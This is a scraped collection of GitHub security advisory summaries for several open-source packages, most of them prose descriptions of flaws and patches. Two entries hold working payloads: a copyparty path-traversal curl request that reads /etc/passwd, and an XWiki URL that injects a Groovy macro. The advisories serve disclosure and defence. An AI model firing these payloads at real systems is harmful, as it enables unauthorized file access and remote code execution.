ghsa

Easy!Appointments 1.4.3 and prior has an Improper Access Control vulnerability. This issue is patched at commit b37b46019553089db4f22eb2fe998bca84b2cb64 and anticipated to be part of version 1.5.0.

Prototype Pollution in GitHub repository automattic/mongoose prior to 7.3.3, 6.11.3, and 5.13.20.

A vulnerability, which was classified as problematic, was found in layui up to v2.8.0-rc.16. This affects an unknown part of the component HTML Attribute Handler. The manipulation of the argument title leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 2.8.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-234237 was assigned to this vulnerability.

Unrestricted Upload of File with Dangerous Type in GitHub repository admidio/admidio prior to 4.2.10.

CleverTap Cordova Plugin version 2.6.2 allows a remote attacker to execute JavaScript code in any application that is opened via a specially constructed deeplink by an attacker. This is possible because the plugin does not correctly validate the data coming from the deeplinks before using them.

rswag before 2.10.1 allows remote attackers to read arbitrary JSON and YAML files via directory traversal, because rswag-api can expose a file that is not the OpenAPI (or Swagger) specification file of a project.

### Summary Path traversal vulnerability detected in .cpr subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. Tested in Debian Linux. ### Details Steps to reproduce: 1)Install the software python3 -m pip install --user -U copyparty 2)Execute using the default config : copyparty 3) Execute the POC curl command 4) /etc/passwd file of the remote server is accessible. ### PoC ```bash curl -i -s -k -X GET 'http://172.19.1.2:3923/.cpr/%2Fetc%2Fpasswd' ``` Additional examples: http://172.19.4.2:3923/.cpr/a/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://172.19.4.2:3923/.cpr/deps/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd ### Checking for exposure if copyparty is running behind a reverse proxy, you can check the access-logs for traces of attacks, by grepping your access...

### Impact Passing _callable strings_ (ie `system`) caused the function to be executed. ### Patches Fixed in [v0.2.1](https://github.com/zenstruck/collection/releases/tag/v0.2.1). ### Workarounds Do not allow passing user strings to `EntityRepository::find()` or `query()`. ### References [Fix commit](https://github.com/zenstruck/collection/commit/f4b1c488206e1b1581b06fcd331686846f13f19c).

### Impact Attacker could modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands. ### Credit These bugs were found and disclosed by David Leadbeater <dgl@dgl.cx> (@dgl at Github.com) ### Patches Fixed in version ce596e0dc8cdb288bc7ed5c6a59011ee3a8dc171 ### Workarounds There are no workarounds available ### References Similar exploits to this existed in the past, for terminal emulators: https://nvd.nist.gov/vuln/detail/CVE-2003-0063 https://nvd.nist.gov/vuln/detail/CVE-2008-2383 Additional background and information is also available: https://marc.info/?l=bugtraq&m=104612710031920&w=2 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030

### Impact Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to a possible privilege escalation from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable by opening `<xwiki-host>/xwiki/bin/view/%22%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=SkinsCode.XWikiSkinsSheet&xpage=view` where <xwiki-host is the URL of the XWiki installation. The expected result are two list items with "Edit this skin" and "Test this skin" without any furthe...